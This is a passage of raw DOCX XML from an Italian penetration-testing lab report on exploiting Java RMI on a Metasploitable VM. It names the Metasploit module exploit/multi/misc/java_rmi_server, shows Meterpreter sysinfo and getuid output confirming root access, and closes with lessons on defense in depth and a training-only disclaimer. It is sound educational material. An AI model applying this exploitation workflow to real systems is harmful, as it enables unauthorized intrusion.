            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet          Netmask        Gateway   Interface</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">127.0.0.1       255.0.0.0      0.0.0.0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.11.112  255.255.255.0  0.0.0.0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.3 Informazioni aggiuntive sul sistema compromesso</w:t>
      </w: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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al fine di corroborare ulteriormente l'evidenza dell'accesso ottenuto, sono stati eseguiti i comandi sysinfo e getuid:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11"/>
        <w:tblW w:w="9075.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblBorders>
          <w:top w:color="c9cdd3" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="c9cdd3" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="c9cdd3" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="c9cdd3"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97">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter &gt; sysinfo</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Computer        : metasploitable</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OS              : Linux 2.6.24-16-server (i386)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Architecture    : x86</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter     : java/linux</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter &gt; getuid</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Server username: root</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="72263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6041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pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Analisi dei Risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I risultati ottenuti confermano il pieno raggiungimento degli obiettivi definiti nella consegna dell'esercizio. In particolare, si evidenziano i seguenti elementi di rilievo:</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Efficacia dell'exploit: il modulo exploit/multi/misc/java_rmi_server ha consentito l'ottenimento di una sessione Meterpreter in tempi rapidi e senza necessità di interazione manuale con la vittima, confermando la natura critica della vulnerabilità Insecure Default Configuration del servizio Java RMI.</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Livello di privilegio ottenuto: l'output del comando getuid ha rivelato che il servizio RMI compromesso era in esecuzione con privilegi di amministratore (root), circostanza particolarmente aggravante poiché ha consentito all'attaccante di ottenere, sin dalla fase iniziale di exploitation, il controllo completo del sistema, senza necessità di ulteriori tecniche di privilege escalation.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Visibilità sulla configurazione di rete: i comandi ipconfig e route hanno permesso di ricostruire la topologia di rete del sistema compromesso, informazione che, in uno scenario reale, costituirebbe il punto di partenza per eventuali attività di lateral movement verso altri host della medesima subnet.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Coerenza tra i dati raccolti: le informazioni ottenute tramite Meterpreter (indirizzo IP 192.168.11.112/24) risultano pienamente coerenti con quanto rilevato in fase di ricognizione tramite Nmap, a conferma dell'attendibilità dell'intero processo di assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Conclusioni e Lezioni Apprese</w:t>
      </w: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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esercitazione condotta ha consentito di applicare in modo pratico e strutturato le metodologie fondamentali del penetration testing, dalla fase di ricognizione fino alla piena compromissione di un sistema remoto, offrendo un'esperienza formativa di elevato valore per la comprensione delle dinamiche reali di un attacco informatico.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sotto il profilo tecnico, l'attività ha dimostrato in maniera inequivocabile come una singola vulnerabilità di configurazione — apparentemente circoscritta a un unico servizio applicativo — possa tradursi, in assenza di adeguati controlli compensativi, nella compromissione totale ed immediata di un sistema, con acquisizione di privilegi amministrativi. Tale evidenza empirica rafforza, sul piano didattico, la comprensione del principio secondo cui la sicurezza informatica non può essere garantita dalla protezione di un singolo livello architetturale, ma richiede un approccio integrato e stratificato (defense in depth), fondato sulla riduzione della superficie di attacco, sul principio del minimo privilegio e su capacità di rilevamento e risposta tempestive.</w:t>
      </w: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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sul piano metodologico, l'esercitazione ha altresì evidenziato l'importanza di una fase di ricognizione accurata e progressiva — dalla scansione generica dell'intera subnet fino all'identificazione puntuale delle versioni software — quale presupposto imprescindibile per l'individuazione mirata di exploit efficaci, nonché il valore dell'utilizzo di strumenti consolidati come il Metasploit Framework nell'automazione e nella standardizzazione delle attività di vulnerability assessment e exploitation.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusione, l'attività svolta ha permesso non soltanto di conseguire pienamente gli obiettivi tecnici definiti nella consegna, ma anche di sviluppare una consapevolezza critica, propria della figura professionale dell'ethical hacker, circa la responsabilità etica e giuridica connessa all'esercizio di competenze offensive, nonché circa il ruolo strategico che tali competenze rivestono nella costruzione di infrastrutture digitali resilienti. L'esperienza conferma, in ultima analisi, come la sicurezza informatica debba essere concepita non quale traguardo statico, bensì quale processo continuo di verifica, apprendimento e miglioramento, tanto a livello tecnico quanto organizzativo.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:spacing w:after="300" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="8496b0" w:space="8" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La presente relazione è stata redatta esclusivamente per finalità didattiche, nell'ambito di un'attività di laboratorio svolta in ambiente virtualizzato e controllato. Nessuna delle tecniche descritte è stata applicata al di fuori del contesto formativo autorizzato.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId16" w:type="default"/>
      <w:footerReference r:id="rId1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center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="8496b0"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Pagina </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="8496b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496b0"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve"> di </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="8496b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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="8496b0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Relazione di Laboratorio — Java RMI Exploitation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ewpfHMgGHeXKCLBKBYNpse/Wpw==">CgMxLjA4AHIhMVZuVWMwZHVFeVBfNnZHbTZ3aW9DcjBGSENHZF9aeVY3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